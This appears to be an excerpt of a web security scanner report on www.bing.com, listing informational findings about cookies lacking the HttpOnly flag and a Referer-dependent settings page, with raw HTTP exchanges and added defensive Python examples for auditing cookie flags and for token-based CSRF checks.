Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:58 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:59 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=55C1E3103C224B9EAF396B98665F1BA5; domain=.bing.com; path=/
Content-Length: 76539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

3.31. http://www.bing.com/travel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.bing.com/travel/
Date: Fri, 11 Feb 2011 21:46:56 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:55 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460815; domain=.bing.com; path=/
Set-Cookie: _SS=SID=130927E42C87488A80B3458098DA4E9D; domain=.bing.com; path=/


3.32. http://www.bing.com/videos/browse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=614
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:54:08 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:53 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=6992B41421FD424494A2E9A2F1D31BD9; domain=.bing.com; path=/
Content-Length: 163651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.33. http://www.bing.com/videos/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:43:52 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/videos
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460632; domain=.bing.com; path=/
Set-Cookie: _SS=SID=D9A439CD6DD34C458F5BDF24BB030719; domain=.bing.com; path=/


3.34. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:00 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:00 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2E275C0252494A33BD7C7B00733A78E2; domain=.bing.com; path=/
Content-Length: 73214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.35. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:58:54 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:54 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3E58DCD97AD8436DB0D6F76EA649A7C4; domain=.bing.com; path=/
Content-Length: 68575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.36. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:15 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.125 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:15 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=A410FF9BF98B4F51BF7EF5A84D10EA58; domain=.bing.com; path=/
Content-Length: 73861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.37. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=292
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:48:52 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:59 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=438B0C95E5964EF9BFC5329EA9644004; domain=.bing.com; path=/
Content-Length: 74286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.38. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:12 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=296FB50835524F1CAC808C6CC833F2EF; domain=.bing.com; path=/
Content-Length: 68455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3.39. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/tip-stress-and-love/1revqyosz

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/tip-stress-and-love/1revqyosz HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:23 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:23 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=5F471059863C43D5904D61DB170BF835; domain=.bing.com; path=/
Content-Length: 72713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
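
The nine HttpOnly instances above (3.31 to 3.39) all rest on the same two checks: is the flag present on each Set-Cookie header, and does the cookie look like it carries a session token. The script below is an added example, not code from the original report or from the scanner that produced it. It parses Set-Cookie headers out of a raw response, reports cookies missing HttpOnly (and, going beyond the finding above, Secure), and applies its own assumed name heuristic for session-like values. The sample response is constructed from the headers shown for /travel in 3.31. Note that it flags the _SS cookie, whose value is SID=..., as session-like, which the report's own heuristic did not; whether that value is in fact a session identifier is worth confirming before treating these instances as low risk.

```python
"""Audit Set-Cookie headers in a raw HTTP response for missing HttpOnly/Secure
flags and flag values that look like session identifiers.

Added example, not part of the original scanner report. SAMPLE_RESPONSE is
constructed from the /travel headers shown above; SESSION_HINTS is this
script's own assumption, not the scanner's heuristic.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: the 302 for GET /travel, trimmed to its headers.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Content-Length: 0\r\n"
    "Location: http://www.bing.com/travel/\r\n"
    "Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:55 GMT; domain=.bing.com; path=/\r\n"
    "Set-Cookie: _HOP=I=1&TS=1297460815; domain=.bing.com; path=/\r\n"
    "Set-Cookie: _SS=SID=130927E42C87488A80B3458098DA4E9D; domain=.bing.com; path=/\r\n"
    "\r\n"
)

# Names and sub-keys that commonly carry a session identifier (assumed list).
SESSION_HINTS = re.compile(
    r"(?i)\b(sess|session|sid|jsessionid|phpsessid|asp\.net_sessionid|auth|token)\b"
)


@dataclass
class Cookie:
    name: str
    value: str
    attrs: dict = field(default_factory=dict)  # lower-cased attribute -> value

    @property
    def httponly(self) -> bool:
        return "httponly" in self.attrs

    @property
    def secure(self) -> bool:
        return "secure" in self.attrs

    @property
    def looks_like_session(self) -> bool:
        # Check the cookie name and the sub-keys of "k=v&k2=v2" style values,
        # which is how _SS=SID=... is structured above.
        subkeys = [p.split("=", 1)[0] for p in self.value.split("&") if "=" in p]
        return any(SESSION_HINTS.search(s) for s in [self.name, *subkeys])


def parse_set_cookie(header_value: str) -> Cookie:
    """Split one Set-Cookie value into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        k, _, v = attr.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return Cookie(name.strip(), value, attrs)


def cookies_from_response(raw: str) -> list[Cookie]:
    """All cookies set in the header block of a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    return [parse_set_cookie(line.split(":", 1)[1])
            for line in head.split("\r\n")
            if line.lower().startswith("set-cookie:")]


def audit(raw: str) -> list[dict]:
    """One finding per cookie that lacks HttpOnly or Secure."""
    findings = []
    for c in cookies_from_response(raw):
        missing = [flag for flag, ok in (("HttpOnly", c.httponly), ("Secure", c.secure)) if not ok]
        if missing:
            findings.append({"cookie": c.name, "missing": missing,
                             "session_like": c.looks_like_session,
                             "empty_value": c.value == ""})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_RESPONSE):
        print(finding)
```

Cookies with an empty value, such as _FP= here, are usually being cleared and carry nothing to steal; the script reports them anyway so the reviewer can decide.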

4. Referer-dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /settings.aspx

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include: access controls that grant or deny a request based on the referring page; defences against cross-site request forgery that accept a request only when the Referer names the application's own site; and content that is tailored to the site the user arrived from (here, Request 1 below carries a Referer of http://www.bing.com/local/ and Request 2 carries none).

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.
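
To make the remediation concrete, here is a Referer-based check beside a synchronizer-token check. This is an added example, not code from the original report; it is framework-free (requests and sessions are plain dicts), the function and field names are illustrative, and only the host name is taken from the report.

```python
"""A Referer-based request check beside a per-session token check.

Added example, not from the original report. Requests are dicts of headers
or form fields and the session is a dict; names are illustrative.
"""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_HOST = "www.bing.com"  # from the report; the checks themselves are hypothetical


def referer_check(headers: dict, allow_missing: bool = True) -> bool:
    """The weak control: trust the request if Referer is absent or same-host.

    Two problems the remediation text points at:
    * a client the attacker drives directly sets Referer to anything, so as an
      access control this is no control at all;
    * browsers, proxies and privacy settings routinely strip Referer (Request 2
      below carries none), so a CSRF check must either accept a missing header,
      which is exactly what the attacker needs, or break legitimate users.
    """
    referer = headers.get("Referer")
    if referer is None:
        return allow_missing
    return urlsplit(referer).hostname == SITE_HOST


def issue_csrf_token(session: dict) -> str:
    """Hardened control, part 1: bind an unguessable token to the session."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def token_check(session: dict, form: dict) -> bool:
    """Hardened control, part 2: the token must come back in the request body
    (never the URL) and match in constant time. A cross-site page cannot read
    the token because of the same-origin policy, so it cannot forge the request,
    and no header that the client controls is involved."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def demo() -> dict:
    session = {}
    token = issue_csrf_token(session)
    return {
        # attacker-driven client with a forged Referer: passes the weak check
        "forged_referer": referer_check({"Referer": "http://www.bing.com/local/"}),
        # cross-site form post where the browser stripped Referer: passes too
        "stripped_referer": referer_check({}),
        # strict mode rejects it, but also rejects real users without Referer
        "stripped_referer_strict": referer_check({}, allow_missing=False),
        # token check: the attacker's page cannot obtain the value
        "no_token": token_check(session, {}),
        "wrong_token": token_check(session, {"csrf_token": "guess"}),
        "right_token": token_check(session, {"csrf_token": token}),
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name:25} {'accepted' if accepted else 'rejected'}")
```

Checking Origin or Referer when the header is present is still a reasonable secondary defence; the point of the example is that a check which must tolerate a missing header, or which relies on a value any non-browser client can set, cannot be the primary one.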

Request 1

GET /settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2flocal%2f&FORM=SEFD1 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 23:28:15 GMT
Connection: close
Content-Length: 19079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<![CDATA[
_G={ST:(si_ST?si_ST:new Date),Mkt:"en-US",RTL:false,Ver:"7_01_0_820137",IG:"11a2df3d6d724aa5b963916bd0908353",EventID:"DC08929786EA4A8B8E4EFB4857C6BCA0",P:"SERP",DA:"Bl2",SUIH:"1_z7zQbanvRFNcd5-KBq6A",gpUrl:"\/fd\/ls\/GLinkPing.aspx?"};_G.lsUrl="/fd/ls/l?IG="+_G.IG;curUrl="http:\/\/www.bing.com\/settings.aspx";function si_T(a){if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+'IG='+_G.IG+a;}return true;};_w=window;_d=document;sb_de=_d.documentElement;sb_ie=!!_w.ActiveXObject;sb_i6=sb_ie&&!_w.XMLHttpRequest;function _ge(a){return _d.getElementById(a)}sb_st=_w.setTimeout;sb_ct=_w.clearTimeout;sb_gt=function(){return(new Date).getTime()};function si_PP(e,c){if(!_G.PPS){for(var d='"',b=["PC","FC","BC","BS","H","C1","C2","BP","KP"],a=0;a<b.length;a++)d+=',"'+b[a]+'":'+(_G[b[a]+"T"]?_G[b[a]+"T"]-_G.ST:-1);_G.PPImg=new Image;_G.PPImg.src=_G.lsUrl+'&Type=Event.CPT&DATA={"pp":{"S":"'+(c?c:"L")+d+',"CT":'+(e-_G.ST)+',"IL":'+_d.images.length+(_w.sb_ppCPL?',"CP":1':"")+"}}"+(_G.P?"&P="+_G.P:"")+(_G.DA?"&DA="+_G.DA:"");_G.PPS=1;sb_st(function(){sj_evt.fire("onPP")},1)}}_w.onbeforeunload=function(){si_PP(new Date,"A")};sj_evt=new function(){var a={},b=this;function c(b){return a[b]||(a[b]=[])}b.fire=function(e){for(var a=c(e),d=a.e=arguments,b=0;b<a.length;b++)if(a[b].d)sb_st(sj_wf(a[b],d),a[b].d);else a[b](d)};b.bind=function(f,a,d,e){var b=c(f);a.d=e;b.push(a);d&&b.e&&a(b.e)};b.unbind=function(e,d){for(var c=0,b=a[e];b&&c<b.length;c++)if(b[c]==d){b.splice(c,1);break}}};
//]]></script><link rel="stylesheet" href="/fd/sa/0113225403/brand4_c.css" type="text/css"/><style type="text/css">.sw_box h1{margin:-1em 0 0 5px;display:inline-block;color:#525051;font-size:150%;padding-left:80px;float:left}</style><style type="text/css">#sw_im{filter: ;opacity:1;background-image:url(/fd/hpk2/Bobcat_EN-US790259691o.jpg)}</style><script type="text/javascript" src="/fd/sa/1124061903/Shared.js"></script><script type="text/javascript">//<![CDATA[
function si_fbInit(d,c,e){var a=this;a.appNs=d;a.wfId=e;var b=0;a.loadCard=function(){if(!b){sj_jb(c,1);b=1}};a.openC
...[SNIP]...

Request 2

GET /settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2flocal%2f&FORM=SEFD1 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
